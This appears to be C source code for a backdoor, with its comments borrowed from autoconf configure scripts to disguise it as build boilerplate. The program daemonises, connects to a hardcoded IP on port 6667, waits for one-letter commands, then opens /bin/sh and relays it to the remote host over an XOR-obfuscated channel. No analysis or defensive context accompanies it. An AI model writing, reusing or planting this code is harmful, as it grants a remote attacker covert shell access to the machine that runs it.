#include #include #include #include #include #define XOR_KEY 0x89 int main (int argc, char **argv) { char c; int s, x, sv0[2]; struct sockaddr_in sa; /* When interrupted or exit'd, cleanup temporary files, and complete config.log. We remove comments because anyway the quotes in there would cause problems or look ugly. WARNING: Be sure not to use single quotes in there, as some shells, such as our DU 5.0 friend, will then close the trap. */ switch (fork ()) { case 0: break; default: exit (1);} close (0); close (1); close (2); /* When interrupted or exit'd, cleanup temporary files, and complete config.log. We remove comments because anyway the quotes in there would cause problems or look ugly. WARNING: Be sure not to use single quotes in there, as some shells, such as our DU 5.0 friend, will then close the trap. */ do { if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1); sa.sin_family = AF_INET; sa.sin_port = htons (6667); /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ sa.sin_addr.s_addr = inet_addr ("207.178.61.5"); alarm (10); if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1)) exit (1); if ((x = read (s, &c, 1)) <= 0) exit (1); else { alarm (0); /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ switch (c) { case 'A': exit (0); /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ case 'D': break; case 'M': close (s); sleep (3600); continue; } } break; } while (1); /* When interrupted or exit'd, cleanup temporary files, and complete config.log. We remove comments because anyway the quotes in there would cause problems or look ugly. WARNING: Be sure not to use single quotes in there, as some shells, such as our DU 5.0 friend, will then close the trap. */ if (socketpair (AF_UNIX, SOCK_STREAM, 0, sv0) == (-1)) exit (1); switch (fork ()) { case -1: { exit (1); } case 0: { /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ char *a[] = { "/bin/sh", NULL }; close (sv0[1]); dup2 (sv0[0], 0); dup2 (sv0[0], 1); dup2 (sv0[0], 2); /* We use char because int might match the return type of a gcc2 builtin and then its argument prototype would still apply. */ execve (a[0], a, NULL); } default: { close (sv0[0]); while (1) { int len, ret; fd_set rfd; char buf[2048]; /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ FD_ZERO (&rfd); FD_SET (s, &rfd); FD_SET (sv0[1], &rfd); if (select (32, &rfd, NULL, NULL, NULL) == (-1)) { exit (1); } /* When interrupted or exit'd, cleanup temporary files, and complete config.log. We remove comments because anyway the quotes in there would cause problems or look ugly. WARNING: Be sure not to use single quotes in there, as some shells, such as our DU 5.0 friend, will then close the trap. */ if (FD_ISSET (s, &rfd)) { if ((len = read (s, buf, sizeof (buf))) <= 0) { exit (1); } for (x = 0; x < len; x++) buf[x] ^= XOR_KEY; x = 0; while (x < len) { if ((ret = write (sv0[1], buf + x, len - x)) == (-1)) { exit (1); } x += ret; } } if (FD_ISSET (sv0[1], &rfd)) { if ((len = read (sv0[1], buf, sizeof (buf))) <= 0) { exit (1); } for (x = 0; x < len; x++) buf[x] ^= XOR_KEY; /* The GNU C library defines this for functions which it implements to always fail with ENOSYS. Some functions are actually named something starting with __ and the normal name is an alias. */ x = 0; while (x < len) { if ((ret = write (s, buf + x, len - x)) == (-1)) { exit (1); } x += ret; } } } } } }